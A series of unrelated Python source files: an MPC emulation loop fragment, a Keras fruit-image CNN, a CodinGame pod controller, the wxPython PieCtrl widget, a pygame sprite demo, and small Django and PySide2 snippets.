xctr.loc[xdf.index] = xdf.copy()
# Progress emulation by `step`
nxt_inp_emu.loc[udf.index, free] = udf[free].copy()
nxt_inp_emu = nxt_inp_emu.dropna() # Last row of free inp is NaN
self.log.debug(
"Progress emulation with...\n"
"nxt_inp_emu=\n{}\n"
"nxt_x0=\n{}\n".format(nxt_inp_emu, nxt_x0)
)
ey, ex = self.emumod.simulate(nxt_inp_emu, nxt_x0, save_state=True)
# Assert index type is int
# (mshoot doesn't have control over the model implementation)
ey.index = ey.index.astype(int) # Assert index type is int
ex.index = ex.index.astype(int) # Assert index type is int
# TODO: Figure out why the following is needed
if len(xemu.columns) == 0:
# Add columns
for c in ex.columns:
xemu[c] = np.nan
if len(yemu.columns) == 0:
# Add columns
for c in ey.columns:
yemu[c] = np.nan
# Save emulation results to `xemu` and `yemu`
# Comment:
# For unknown reason, ex.index sometimes contains elements
# not present in xemu.index... Therefore, select intersection
intersect = [ti for ti in ex.index if ti in xemu.index]
xemu.loc[intersect] = ex.loc[intersect].copy()
intersect = [ti for ti in ey.index if ti in yemu.index]
yemu.loc[intersect] = ey.loc[intersect].copy()
self.log.info("Updated xemu:\n{}".format(xemu))
self.log.info("Updated xctr:\n{}".format(xctr))
# Increase `t` and `i`
t += dt
i += step
return u, xctr, xemu, yemu, uhist
|
# Libraries
from keras.models import Sequential # Layerları üzerine koyacağımız sıralı yapı, temel gibi düşünülebilir
from keras.layers import Conv2D, MaxPooling2D, Activation, Flatten, Dense, Dropout # Kullanılacak CNN layerları
from keras.preprocessing.image import ImageDataGenerator, img_to_array, load_img
import matplotlib.pyplot as plt
from glob import glob # Belirtilen dosyaları bulmaya yarar
# Datasetlerin pathleri
train_path = "C:/Users/Alican/Documents/Dersler/DL/fruits/Training/"
test_path = "C:/Users/Alican/Documents/Dersler/DL/fruits/Test/"
# Resimlerin boyutunu almak için
img = load_img(train_path + "Apple Braeburn/0_100.jpg")
x = img_to_array(img)
className = glob(train_path + "/*" ) # Classları /* ile baştan sona okur ve className arrayine yazar. len
numberOfClass = len(className) # Class sayısını verir
print("Number of Classes:", numberOfClass)
# CNN Modelini oluşturma, modelde 3 conv layerı olacak
model = Sequential() # Sıralı yapı olacağını belirttik
model.add(Conv2D(32, (3,3), input_shape = x.shape )) # Resimler 2 boyutlu olduğu için conv2d. Parantez içindeki değerler(Filtre(Feature) sayısı, konv. kernel boyutu, keras için input shape )
model.add(Activation("relu")) # Aktivasyon fonksiyonumuz relu olacak (x=<0 ise 0, değilse x)
model.add(MaxPooling2D()) # Pooling layerı
model.add(Conv2D(32, (3,3))) # Input shape sadece ilk conv layerı için gerekli
model.add(Activation("relu"))
model.add(MaxPooling2D())
model.add(Conv2D(64, (3,3)))
model.add(Activation("relu"))
model.add(MaxPooling2D())
# Fully conneceted layerı
model.add(Flatten())
model.add(Dense(1024)) # Dense layerındaki nöron sayısı
model.add(Activation("relu"))
model.add(Dropout(0.5))
# Output layerı
model.add(Dense(numberOfClass)) # Output layerında nöron sayısı class sayısına eşit olmalı
model.add(Activation("softmax"))
model.compile(loss = "categorical_crossentropy",
optimizer = "rmsprop",
metrics = ["accuracy"]) # Softmax kullandığımız için lossumuz bu.
batch_size = 32
epochs = 50
# Data Generation
'''
Datasetimizideki resim sayıları yetersiz olduğu için bu resimleri çeşitli şekilde yeniden generate ederek çeşitlilik artırılır
rescale: Normalizasyon. RGB resimleri grayscale yapar.
shear_range: Resmi rastgele şekilde çevirir
horizontal_flip: Yatay olarak çevirir
zoom: Zoom yapar
'''
train_data_generator = ImageDataGenerator(rescale = 1./255,
shear_range = 0.3,
horizontal_flip = True,
zoom_range = 0.3)
test_data_generator = ImageDataGenerator(rescale = 1./255) # Test datasıda normalize edilir
'''
flow_from_directory: Resimleri verilen path'den okur ve belirlenen generate özelliklerine göre generate eder
Resimler 100,100,3 boyutundadır. son index resmin tipini belirttiği için almaya gerek yok. boyutu [:2] ile okursak 100x100 elde ederiz
color_mode: Resimlerin tipi
class_mode : Tek class mı çok class mı var
'''
train_generator = train_data_generator.flow_from_directory(train_path,
target_size=x.shape[:2],
batch_size = batch_size,
color_mode = "rgb",
class_mode = "categorical")
test_generator = test_data_generator.flow_from_directory(test_path,
target_size=x.shape[:2],
batch_size = batch_size,
color_mode = "rgb",
class_mode = "categorical")
# Model train edilir
'''
steps_per_epoch: 1 epochta yapılması gereken batch sayısı. Normalde 400 adet resim var fakat
biz 1600 resimle eğitmek istiyoruz bu resimler image generatordan geliyor.
validation_steps: Step per epochla aynı mantık
'''
history = model.fit_generator(generator = train_generator,
steps_per_epoch = 1600 // batch_size,
epochs = epochs,
validation_data = test_generator,
validation_steps = 800 // batch_size)
# Kayıt ve plot
model.save_weights("50epoch.h5")
print(history.history.keys())
plt.plot(history.history["loss"], label = "Train Loss")
plt.plot(history.history["val_loss"], label = "Validation Loss")
plt.legend()
plt.show()
plt.figure()
plt.plot(history.history["accuracy"], label = "Train Accuracy")
plt.plot(history.history["val_accuracy"], label = "Validation Accuracy")
plt.legend()
plt.show()
'''
import json
with open("deneme.json","w") as f:
json.dump(history.history, f)
# Kayıtlı weightleri import etme
import codecs
with codecs.open("buraya dosya adı yazılır", "r", encoding = "utf-8") as f:
h = json.loads(f.read())
'''
|
import sys
import math
class Proportional:
def __init__(self, gain, target):
self.gain = gain
self.target = target
def error(self, value):
x, y = value
tx, ty = self.target
return math.sqrt((tx-x)**2 + (ty-y)**2)
def input(self, value):
return self.gain * self.error(value)
thrust_controller = Proportional(0.5, None)
def floor(signal):
signal = int(signal)
if signal >= 100:
signal = 100
elif signal <= 20:
signal = 20
return signal
# game loop
while True:
# next_checkpoint_x: x position of the next check point
# next_checkpoint_y: y position of the next check point
# next_checkpoint_dist: distance to the next checkpoint
# next_checkpoint_angle: angle between your pod orientation and the direction of the next checkpoint
x, y, next_checkpoint_x, next_checkpoint_y, next_checkpoint_dist, next_checkpoint_angle = [int(i) for i in input().split()]
opponent_x, opponent_y = [int(i) for i in input().split()]
thrust_controller.target = (next_checkpoint_x, next_checkpoint_y)
signal = floor(thrust_controller.input((x, y)))
print("{} {} {}".format(next_checkpoint_x, next_checkpoint_y, signal))
|
# --------------------------------------------------------------------------- #
# PIECTRL Control wxPython IMPLEMENTATION
# Python Code By:
#
# Andrea Gavana, @ 31 Oct 2005
# Latest Revision: 30 Nov 2009, 17.00 GMT
#
#
# TODO List/Caveats
#
# 1. Maybe Integrate The Very Nice PyOpenGL Implementation Of A PieChart Coded
# By Will McGugan?
#
# 2. Not Tested On Other Platforms, Only On Windows 2000/XP, With Python 2.4.1
# And wxPython 2.6.1.0
#
# For All Kind Of Problems, Requests Of Enhancements And Bug Reports, Please
# Write To Me At:
#
# andrea.gavana@gmail.com
# gavana@kpo.kz
#
# Or, Obviously, To The wxPython Mailing List!!!
#
#
# End Of Comments
# --------------------------------------------------------------------------- #
"""
PieCtrl/ProgressPie are simple classes that reproduce the behavior of a pie
chart.
Description
===========
PieCtrl/ProgressPie are simple classes that reproduce the behavior of a pie
chart. They use only pure wxPython classes/methods, without external dependencies.
PieCtrl is somewhat a "static" control, that you may create in order to display
a simple pie chart on a `wx.Panel` or similar. ProgressPie tries to emulate the
behavior of `wx.ProgressDialog`, but using a pie chart instead of a gauge.
Usage
=====
An example of use of PieCtrl is as follows::
# create a simple PieCtrl with 3 sectors
mypie = PieCtrl(panel, -1, wx.DefaultPosition, wx.Size(180,270))
part = PiePart()
part.SetLabel("serieslabel_1")
part.SetValue(300)
part.SetColour(wx.Colour(200, 50, 50))
mypie._series.append(part)
part = PiePart()
part.SetLabel("series label 2")
part.SetValue(200)
part.SetColour(wx.Colour(50, 200, 50))
mypie._series.append(part)
part = PiePart()
part.SetLabel("helloworld label 3")
part.SetValue(50)
part.SetColour(wx.Colour(50, 50, 200))
mypie._series.append(part)
An example of use of ProgressPie is as follows::
# create a progresspie
MyProgressPie = ProgressPie(panel, 100, 50, -1, wx.DefaultPosition,
wx.Size(180, 200), wx.SIMPLE_BORDER)
MyProgressPie.SetBackColour(wx.Colour(150, 200, 255))
myprogresspie.SetFilledcolour(wx.Colour(255, 0, 0))
MyProgressPie.SetUnfilledColour(wx.WHITE)
MyProgressPie.SetHeight(20)
Methods and Settings
====================
With PieCtrl you can:
- Create a PieCtrl with different sectors;
- Set the sector values, colours and labels;
- Assign a legend to the PieCtrl;
- Use an image as the PieCtrl background;
- Change the vertical rotation (perspective) of the PieCtrl;
- Show/hide the segment edges.
Window Styles
=============
`No particular window styles are available for this class.`
Events Processing
=================
`No custom events are available for this class.`
License And Version
===================
PieCtrl is distributed under the wxPython license.
Latest revision: Andrea Gavana @ 30 Nov 2009, 17.00 GMT
Version 0.2
"""
#----------------------------------------------------------------------
# Beginning Of PIECTRL wxPython Code
#----------------------------------------------------------------------
import wx
from math import pi, sin, cos
#----------------------------------------------------------------------
# Class PieCtrlLegend
# This Class Handles The Legend For The Classic PieCtrl.
#----------------------------------------------------------------------
class PieCtrlLegend(wx.Window):
"""
This class displays a legend window for the classic L{PieCtrl}.
"""
def __init__(self, parent, title, id=wx.ID_ANY, pos=wx.DefaultPosition,
size=wx.DefaultSize, style=0):
"""
Default class constructor.
:param `parent`: the L{PieCtrlLegend} parent;
:param `title`: the legend title;
:param `id`: window identifier. A value of -1 indicates a default value;
:param `pos`: the control position. A value of (-1, -1) indicates a default position,
chosen by either the windowing system or wxPython, depending on platform;
:param `size`: the control size. A value of (-1, -1) indicates a default size,
chosen by either the windowing system or wxPython, depending on platform;
:param `style`: the window style (unused).
"""
wx.Window.__init__(self, parent, id, pos, size, style)
self._title = title
self._istransparent = False
self._horborder = 5
self._verborder = 5
self._titlecolour = wx.Colour(0, 0, 127)
self._labelcolour = wx.BLACK
self._backcolour = wx.Colour(255, 255, 0)
self._backgroundDC = wx.MemoryDC()
self._parent = parent
self.Bind(wx.EVT_ERASE_BACKGROUND, lambda x: None)
self.Bind(wx.EVT_PAINT, self.OnPaint)
def SetTransparent(self, value=False):
"""
Toggles the legend transparency (visibility).
:param `value`: ``True`` to set the legend as transparent, ``False`` otherwise.
"""
self._istransparent = value
self.Refresh()
def RecreateBackground(self, parentdc):
"""
Recreates the legend background.
:param `parentdc`: an instance of `wx.DC`.
"""
w, h = self.GetSize()
self._background = wx.EmptyBitmap(w, h)
self._backgroundDC.SelectObject(self._background)
if self.IsTransparent():
self._backgroundDC.Blit(0, 0, w, h, parentdc, self.GetPosition().x,
self.GetPosition().y)
else:
self._backgroundDC.SetBackground(wx.Brush(self._backcolour))
self._backgroundDC.Clear()
self.Refresh()
def SetHorizontalBorder(self, value):
"""
Sets the legend's horizontal border.
:param `value`: the horizontal border thickness, in pixels.
"""
self._horborder = value
self.Refresh()
def GetHorizontalBorder(self):
""" Returns the legend's horizontal border, in pixels. """
return self._horborder
def SetVerticalBorder(self, value):
"""
Sets the legend's vertical border.
:param `value`: the horizontal border thickness, in pixels.
"""
self._verborder = value
self.Refresh()
def GetVerticalBorder(self):
""" Returns the legend's vertical border, in pixels. """
return self._verborder
def SetLabelColour(self, colour):
"""
Sets the legend label colour.
:param `colour`: a valid `wx.Colour` object.
"""
self._labelcolour = colour
self.Refresh()
def GetLabelColour(self):
""" Returns the legend label colour. """
return self._labelcolour
def SetLabelFont(self, font):
"""
Sets the legend label font.
:param `font`: a valid `wx.Font` object.
"""
self._labelfont = font
self.Refresh()
def GetLabelFont(self):
""" Returns the legend label font. """
return self._labelfont
def SetBackColour(self, colour):
"""
Sets the legend background colour.
:param `colour`: a valid `wx.Colour` object.
"""
self._backcolour = colour
self.Refresh()
def GetBackColour(self):
""" Returns the legend background colour. """
return self._backcolour
def IsTransparent(self):
""" Returns whether the legend background is transparent or not. """
return self._istransparent
def OnPaint(self, event):
"""
Handles the ``wx.EVT_PAINT`` event for L{PieCtrlLegend}.
:param `event`: a `wx.PaintEvent` event to be processed.
"""
pdc = wx.PaintDC(self)
w, h = self.GetSize()
bmp = wx.EmptyBitmap(w, h)
mdc = wx.MemoryDC()
mdc.SelectObject(bmp)
if self.IsTransparent():
parentdc = wx.ClientDC(self.GetParent())
mdc.Blit(0, 0, w, h, self._backgroundDC, 0, 0)
else:
mdc.SetBackground(wx.Brush(self._backcolour))
mdc.Clear()
dy = self._verborder
mdc.SetFont(self._labelfont)
mdc.SetTextForeground(self._labelcolour)
maxwidth = 0
for ii in xrange(len(self._parent._series)):
tw, th = mdc.GetTextExtent(self._parent._series[ii].GetLabel())
mdc.SetBrush(wx.Brush(self._parent._series[ii].GetColour()))
mdc.DrawCircle(self._horborder+5, dy+th/2, 5)
mdc.DrawText(self._parent._series[ii].GetLabel(), self._horborder+15, dy)
dy = dy + th + 3
maxwidth = max(maxwidth, int(2*self._horborder+tw+15))
dy = dy + self._verborder
if w != maxwidth or h != dy:
self.SetSize((maxwidth, dy))
pdc.Blit(0, 0, w, h, mdc, 0, 0)
#----------------------------------------------------------------------
# Class PiePart
# This Class Handles The Legend Segments Properties, Such As Value,
# Colour And Label.
#----------------------------------------------------------------------
class PiePart(object):
"""
This class handles the legend segments properties, such as value,
colour and label.
"""
def __init__(self, value=0, colour=wx.BLACK, label=""):
"""
Default class constructor.
:param `value`: the pie part value;
:param `colour`: the pie part colour;
:param `label`: the pie part text label.
"""
self._value = value
self._colour = colour
self._label = label
def SetValue(self, value):
"""
Sets the segment absolute value.
:param `value`: a floating point number representing the L{PiePart} value.
"""
self._value = value
def GetValue(self):
""" Returns the segment absolute value. """
return self._value
def SetColour(self, colour):
"""
Sets the segment colour.
:param `colour`: a valid `wx.Colour` object.
"""
self._colour = colour
def GetColour(self):
""" Returns the segment colour. """
return self._colour
def SetLabel(self, label):
"""
Sets the segment label.
:param `label`: the pie part text label.
"""
self._label = label
def GetLabel(self):
""" Returns the segment label. """
return self._label
#----------------------------------------------------------------------
# Class PieCtrl
# This Is The Main PieCtrl Implementation, Used Also By ProgressPie.
#----------------------------------------------------------------------
class PieCtrl(wx.Window):
"""
PieCtrl is somewhat a "static" control, that you may create in order to display
a simple pie chart on a `wx.Panel` or similar.
"""
def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,
size=wx.DefaultSize, style=0, name="PieCtrl"):
"""
Default class constructor.
:param `parent`: the L{PieCtrl} parent. Must not be ``None``;
:param `id`: window identifier. A value of -1 indicates a default value;
:param `pos`: the control position. A value of (-1, -1) indicates a default position,
chosen by either the windowing system or wxPython, depending on platform;
:param `size`: the control size. A value of (-1, -1) indicates a default size,
chosen by either the windowing system or wxPython, depending on platform;
:param `style`: the window style (unused);
:param `name`: the window name.
"""
wx.Window.__init__(self, parent, id, pos, size, style, name)
self._angle = pi/12
self._rotationangle = 0
self._height = 10
self._background = wx.NullBitmap
self._canvasbitmap = wx.EmptyBitmap(1, 1)
self._canvasDC = wx.MemoryDC()
self._backcolour = wx.WHITE
self._showedges = True
self._series = []
self.Bind(wx.EVT_ERASE_BACKGROUND, lambda x: None)
self.Bind(wx.EVT_SIZE, self.OnSize)
self.Bind(wx.EVT_PAINT, self.OnPaint)
self.RecreateCanvas()
self._legend = PieCtrlLegend(self, "PieCtrl", -1, wx.Point(10,10), wx.Size(100,75))
def SetBackground(self, bmp):
"""
Sets the L{PieCtrl} background image.
:param `bmp`: a valid `wx.Bitmap` object.
"""
self._background = bmp
self.Refresh()
def GetBackground(self):
""" Returns the L{PieCtrl} background image. """
return self._background
def OnSize(self, event):
"""
Handles the ``wx.EVT_SIZE`` event for L{PieCtrl}.
:param `event`: a `wx.SizeEvent` event to be processed.
"""
self.RecreateCanvas()
self.Refresh()
event.Skip()
def RecreateCanvas(self):
""" Recreates the L{PieCtrl} container (canvas). """
self._canvasbitmap = wx.EmptyBitmap(self.GetSize().GetWidth(),
self.GetSize().GetHeight())
self._canvasDC.SelectObject(self._canvasbitmap)
def GetPartAngles(self):
""" Returns the angles associated to all segments. """
angles = []
total = 0.0
for ii in xrange(len(self._series)):
total = total + self._series[ii].GetValue()
current = 0.0
angles.append(current)
for ii in xrange(len(self._series)):
current = current + self._series[ii].GetValue()
angles.append(360.0*current/total)
return angles
def SetAngle(self, angle):
"""
Sets the orientation angle for L{PieCtrl}.
:param `angle`: the orientation angle for L{PieCtrl}, in radians.
"""
if angle < 0:
angle = 0
if angle > pi/2:
angle = pi/2
self._angle = angle
self.Refresh()
def GetAngle(self):
""" Returns the orientation angle for L{PieCtrl}, in radians. """
return self._angle
def SetRotationAngle(self, angle):
"""
Sets the angle at which the first sector starts.
:param `angle`: the first sector angle, in radians.
"""
if angle < 0:
angle = 0
if angle > 2*pi:
angle = 2*pi
self._rotationangle = angle
self.Refresh()
def GetRotationAngle(self):
""" Returns the angle at which the first sector starts, in radians. """
return self._rotationangle
def SetShowEdges(self, value=True):
"""
Sets whether the L{PieCtrl} edges are visible or not.
:param `value`: ``True`` to show the edges, ``False`` to hide them.
"""
self._showedges = value
self.Refresh()
def GetShowEdges(self):
""" Returns whether the L{PieCtrl} edges are visible or not. """
return self._showedges
def SetBackColour(self, colour):
"""
Sets the L{PieCtrl} background colour.
:param `colour`: a valid `wx.Colour` object.
"""
self._backcolour = colour
self.Refresh()
def GetBackColour(self):
""" Returns the L{PieCtrl} background colour. """
return self._backcolour
def SetHeight(self, value):
"""
Sets the height (in pixels) of the L{PieCtrl}.
:param `value`: the new height of the widget, in pixels.
"""
self._height = value
def GetHeight(self):
""" Returns the height (in pixels) of the L{PieCtrl}. """
return self._height
def GetLegend(self):
""" Returns the L{PieCtrl} legend. """
return self._legend
def DrawParts(self, dc, cx, cy, w, h):
"""
Draws the L{PieCtrl} external edges.
:param `dc`: an instance of `wx.DC`;
:param `cx`: the part x coordinate;
:param `cy`: the part y coordinate;
:param `w`: the control's width;
:param `h`: the control's height.
"""
angles = self.GetPartAngles()
oldpen = dc.GetPen()
if self._showedges:
dc.SetPen(wx.BLACK_PEN)
for ii in xrange(len(angles)):
if ii > 0:
if not self._showedges:
dc.SetPen(wx.Pen(self._series[ii-1].GetColour()))
dc.SetBrush(wx.Brush(self._series[ii-1].GetColour()))
if angles[ii-1] != angles[ii]:
dc.DrawEllipticArc(0, int((1-sin(self._angle))*(h/2)+cy), w,
int(h*sin(self._angle)),
angles[ii-1]+self._rotationangle/pi*180,
angles[ii]+self._rotationangle/pi*180)
if len(self._series) == 1:
dc.SetBrush(wx.Brush(self._series[0].GetColour()))
dc.DrawEllipticArc(0, int((1-sin(self._angle))*(h/2)+cy), w,
int(h*sin(self._angle)), 0, 360)
dc.SetPen(oldpen)
def Draw(self, pdc):
"""
Draws all the sectors of L{PieCtrl}.
:param `dc`: an instance of `wx.DC`.
"""
w, h = self.GetSize()
self._canvasDC.BeginDrawing()
self._canvasDC.SetBackground(wx.WHITE_BRUSH)
self._canvasDC.Clear()
if self._background != wx.NullBitmap:
for ii in xrange(0, w, self._background.GetWidth()):
for jj in xrange(0, h, self._background.GetHeight()):
self._canvasDC.DrawBitmap(self._background, ii, jj)
else:
self._canvasDC.SetBackground(wx.Brush(self._backcolour))
self._canvasDC.Clear()
if len(self._series) > 0:
if self._angle <= pi/2:
self.DrawParts(self._canvasDC, 0, int(self._height*cos(self._angle)), w, h)
else:
self.DrawParts(self._canvasDC, 0, 0, w, h)
points = [[0, 0]]*4
triangle = [[0, 0]]*3
self._canvasDC.SetPen(wx.Pen(wx.BLACK))
angles = self.GetPartAngles()
angleindex = 0
self._canvasDC.SetBrush(wx.Brush(wx.Colour(self._series[angleindex].GetColour().Red(),
self._series[angleindex].GetColour().Green(),
self._series[angleindex].GetColour().Blue())))
changeangle = False
x = 0.0
while x <= 2*pi:
changeangle = False
if angleindex < len(angles):
if x/pi*180.0 >= angles[angleindex+1]:
changeangle = True
x = angles[angleindex+1]*pi/180.0
points[0] = points[1]
px = int(w/2*(1+cos(x+self._rotationangle)))
py = int(h/2-sin(self._angle)*h/2*sin(x+self._rotationangle)-1)
points[1] = [px, py]
triangle[0] = [w / 2, h / 2]
triangle[1] = points[0]
triangle[2] = points[1]
if x > 0:
self._canvasDC.SetBrush(wx.Brush(self._series[angleindex].GetColour()))
oldPen = self._canvasDC.GetPen()
self._canvasDC.SetPen(wx.Pen(self._series[angleindex].GetColour()))
self._canvasDC.DrawPolygon([wx.Point(pts[0], pts[1]) for pts in triangle])
self._canvasDC.SetPen(oldPen)
if changeangle:
angleindex = angleindex + 1
x = x + 0.05
x = 2*pi
points[0] = points[1]
px = int(w/2 * (1+cos(x+self._rotationangle)))
py = int(h/2-sin(self._angle)*h/2*sin(x+self._rotationangle)-1)
points[1] = [px, py]
triangle[0] = [w / 2, h / 2]
triangle[1] = points[0]
triangle[2] = points[1]
self._canvasDC.SetBrush(wx.Brush(self._series[angleindex].GetColour()))
oldPen = self._canvasDC.GetPen()
self._canvasDC.SetPen(wx.Pen(self._series[angleindex].GetColour()))
self._canvasDC.DrawPolygon([wx.Point(pts[0], pts[1]) for pts in triangle])
self._canvasDC.SetPen(oldPen)
angleindex = 0
x = 0.0
while x <= 2*pi:
changeangle = False
if angleindex < len(angles):
if x/pi*180 >= angles[angleindex+1]:
changeangle = True
x = angles[angleindex+1]*pi/180
points[0] = points[1]
points[3] = points[2]
px = int(w/2 * (1+cos(x+self._rotationangle)))
py = int(h/2-sin(self._angle)*h/2*sin(x+self._rotationangle)-1)
points[1] = [px, py]
points[2] = [px, int(py+self._height*cos(self._angle))]
if w > 0:
curColour = wx.Colour(self._series[angleindex].GetColour().Red()*(1.0-float(px)/w),
self._series[angleindex].GetColour().Green()*(1.0-float(px)/w),
self._series[angleindex].GetColour().Blue()*(1.0-float(px)/w))
if not self._showedges:
self._canvasDC.SetPen(wx.Pen(curColour))
self._canvasDC.SetBrush(wx.Brush(curColour))
if sin(x+self._rotationangle) < 0 and sin(x-0.05+self._rotationangle) <= 0 and x > 0:
self._canvasDC.DrawPolygon([wx.Point(pts[0], pts[1]) for pts in points])
if changeangle:
angleindex = angleindex + 1
x = x + 0.05
x = 2*pi
points[0] = points[1]
points[3] = points[2]
px = int(w/2 * (1+cos(x+self._rotationangle)))
py = int(h/2-sin(self._angle)*h/2*sin(x+self._rotationangle)-1)
points[1] = [px, py]
points[2] = [px, int(py+self._height*cos(self._angle))]
if w > 0:
curColour = wx.Colour(self._series[angleindex].GetColour().Red()*(1.0-float(px)/w),
self._series[angleindex].GetColour().Green()*(1.0-float(px)/w),
self._series[angleindex].GetColour().Blue()*(1.0-float(px)/w))
if not self._showedges:
self._canvasDC.SetPen(wx.Pen(curColour))
self._canvasDC.SetBrush(wx.Brush(curColour))
if sin(x+self._rotationangle) < 0 and sin(x-0.05+self._rotationangle) <= 0:
self._canvasDC.DrawPolygon([wx.Point(pts[0], pts[1]) for pts in points])
if self._angle <= pi/2:
self.DrawParts(self._canvasDC, 0, 0, w, h)
else:
self.DrawParts(self._canvasDC, 0, int(self._height*cos(self._angle)), w, h)
self._canvasDC.EndDrawing()
pdc.Blit(0, 0, w, h, self._canvasDC, 0, 0)
self._legend.RecreateBackground(self._canvasDC)
def OnPaint(self, event):
"""
Handles the ``wx.EVT_PAINT`` event for L{PieCtrl}.
:param `event`: a `wx.PaintEvent` event to be processed.
"""
pdc = wx.PaintDC(self)
self.Draw(pdc)
#----------------------------------------------------------------------
# Class ProgressPie
# This Is The Main ProgressPie Implementation. Is Is A Subclassing Of
# PieCtrl, With 2 Sectors.
#----------------------------------------------------------------------
class ProgressPie(PieCtrl):
"""
ProgressPie tries to emulate the behavior of `wx.ProgressDialog`, but
using a pie chart instead of a gauge.
"""
def __init__(self, parent, maxvalue, value, id=wx.ID_ANY,
pos=wx.DefaultPosition, size=wx.DefaultSize, style=0):
"""
Default class constructor.
:param `parent`: the L{PieCtrl} parent. Must not be ``None``;
:param `id`: window identifier. A value of -1 indicates a default value;
:param `pos`: the control position. A value of (-1, -1) indicates a default position,
chosen by either the windowing system or wxPython, depending on platform;
:param `size`: the control size. A value of (-1, -1) indicates a default size,
chosen by either the windowing system or wxPython, depending on platform;
:param `style`: the window style (unused);
:param `name`: the window name.
"""
PieCtrl.__init__(self, parent, id, pos, size, style)
self._maxvalue = maxvalue
self._value = value
self.GetLegend().Hide()
self._filledcolour = wx.Colour(0, 0, 127)
self._unfilledcolour = wx.WHITE
part = PiePart()
part.SetColour(self._filledcolour)
a = min(float(value), maxvalue)
part.SetValue(max(a, 0.0))
self._series.append(part)
part = PiePart()
part.SetColour(self._unfilledcolour)
part.SetValue(max(0.0, maxvalue-part.GetValue()))
self._series.append(part)
def SetValue(self, value):
"""
Sets the L{ProgressPie} value.
:param `value`: a floating point number representing the new value.
"""
self._value = min(value, self._maxvalue)
self._series[0].SetValue(max(self._value, 0.0))
self._series[1].SetValue(max(self._maxvalue-self._value, 0.0))
self.Refresh()
def GetValue(self):
""" Returns the L{ProgressPie} value. """
return self._value
def SetMaxValue(self, value):
"""
Sets the L{ProgressPie} maximum value.
:param `value`: a floating point number representing the maximum value.
"""
self._maxvalue = value
self._value = min(self._value, self._maxvalue)
self._series[0].SetValue(max(self._value, 0.0))
self._series[1].SetValue(max(self._maxvalue-self._value, 0.0))
self.Refresh()
def GetMaxValue(self):
""" Returns the L{ProgressPie} maximum value. """
return self._maxvalue
def SetFilledColour(self, colour):
"""
Sets the colour that progressively fills the L{ProgressPie} .
:param `colour`: a valid `wx.Colour` object.
"""
self._filledcolour = colour
self._series[0].SetColour(self._filledcolour)
self.Refresh()
def SetUnfilledColour(self, colour):
"""
Sets the colour that is filled.
:param `colour`: a valid `wx.Colour` object.
"""
self._unfilledcolour= colour
self._series[1].SetColour(self._unfilledcolour)
self.Refresh()
def GetFilledColour(self):
""" Returns the colour that progressively fills the L{ProgressPie}. """
return self._filledcolour
def GetUnfilledColour(self):
""" Returns the colour that is filled. """
return self._unfilledcolour
|
import pygame
import random
# Define some colors
BLACK = ( 0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
BLUE = ( 0, 0, 255)
class MyEllipse(pygame.sprite.Sprite):
def __init__(self, color, width, height):
"""
Ellipse Constructor. Pass in the color of the ellipse,
and its size
"""
# Call the parent class (Sprite) constructor
super().__init__()
# Set the background color and set it to be transparent
self.image = pygame.Surface([width, height])
self.image.fill(WHITE)
self.image.set_colorkey(WHITE)
# Draw the ellipse
pygame.draw.ellipse(self.image, color, [0, 0, width, height])
self.rect = self.image.get_rect()
class Ship(pygame.sprite.Sprite):
def __init__(self):
""" Graphic Sprite Constructor. """
# Call the parent class (Sprite) constructor
super().__init__()
# Load the image
self.image = pygame.image.load("player.bmp").convert()
# Set our transparent color
self.image.set_colorkey(WHITE)
self.rect = self.image.get_rect()
# Initialize Pygame
pygame.init()
# Set the height and width of the screen
screen_width = 700
screen_height = 400
screen = pygame.display.set_mode([screen_width, screen_height])
# This is a list of 'sprites.' Each block in the program is
# added to this list. The list is managed by a class called 'Group.'
myellipse_list = pygame.sprite.Group()
# This is a list of every sprite.
# All blocks and the player block as well.
all_sprites_list = pygame.sprite.Group()
for i in range(50):
# This represents a block
myellipse = MyEllipse(BLUE, 20, 15)
# Set a random location for the block
myellipse.rect.x = random.randrange(screen_width)
myellipse.rect.y = random.randrange(screen_height)
# Add the block to the list of objects
myellipse_list.add(myellipse)
all_sprites_list.add(myellipse)
# Create a RED player block
player = Ship
all_sprites_list.add(player)
# Loop until the user clicks the close button.
done = False
# Used to manage how fast the screen updates
clock = pygame.time.Clock()
score = 0
# -------- Main Program Loop -----------
while not done:
for event in pygame.event.get():
if event.type == pygame.QUIT:
done = True
# Clear the screen
screen.fill(WHITE)
# Get the current mouse position. This returns the position
# as a list of two numbers.
pos = pygame.mouse.get_pos()
# Fetch the x and y out of the list,
# just like we'd fetch letters out of a string.
# Set the player object to the mouse location
player.rect.x = pos[0]
player.rect.y = pos[1]
# See if the player block has collided with anything.
myellipse_hit_list = pygame.sprite.spritecollide(player, myellipse_list, True)
# Check the list of collisions.
for myellipse in myellipse_hit_list:
score += 1
print(score)
# Draw all the spites
all_sprites_list.draw(screen)
# Go ahead and update the screen with what we've drawn.
pygame.display.flip()
# Limit to 60 frames per second
clock.tick(60)
pygame.quit()
|
from django.urls import path
from .views import about_page
urlpatterns = [
path('', about_page, name='about')
]
|
from PySide2.QtWidgets import QWidget
from PySide2.QtGui import QPixmap, QMouseEvent, Qt
from PySide2.QtCore import QRect, QTimer
from ui.interesting_ui import Ui_Interesting
class Interesting(QWidget, Ui_Interesting):
def __init__(self, parent=None):
super().__init__(parent)
self.setupUi(self)
self.setAttribute(Qt.WA_TranslucentBackground, True)
self.setAttribute(Qt.WA_QuitOnClose, False)
self.setMouseTracking(True)
self.mousePos = (0, 0)
self.isPressed = False
self.frame = 0
self.original = QPixmap("./resources/lucifer.png")
self.pixmaps = [self.original.copy(QRect(i*100, 0, 100, 100)) for i in range(12)]
self.label.setPixmap(self.pixmaps[self.frame])
self.timer = QTimer(self)
self.timer.timeout.connect(self.nextFrame)
self.timer.start(1000//25)
def mousePressEvent(self, event: QMouseEvent):
self.isPressed = True
self.mousePos = event.x(), event.y()
def mouseReleaseEvent(self, event: QMouseEvent):
self.isPressed = False
def mouseDoubleClickEvent(self, event: QMouseEvent):
if event.buttons() & Qt.RightButton:
self.close()
elif event.buttons() & Qt.MiddleButton:
pass
def mouseMoveEvent(self, event: QMouseEvent):
if self.isPressed: self.move(event.globalX() - self.mousePos[0], event.globalY() - self.mousePos[1])
def nextFrame(self):
self.frame += 1
self.frame %= 12
self.label.setPixmap(self.pixmaps[self.frame]) |
"""HADDOCK3 actions referring to refinement."""
|
import os
from django.conf import settings
from django.contrib.auth import logout as django_logout
from django.contrib.sites.models import Site
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.views.generic import View, TemplateView
from luna_django_commons.app.mixins import get_login_context
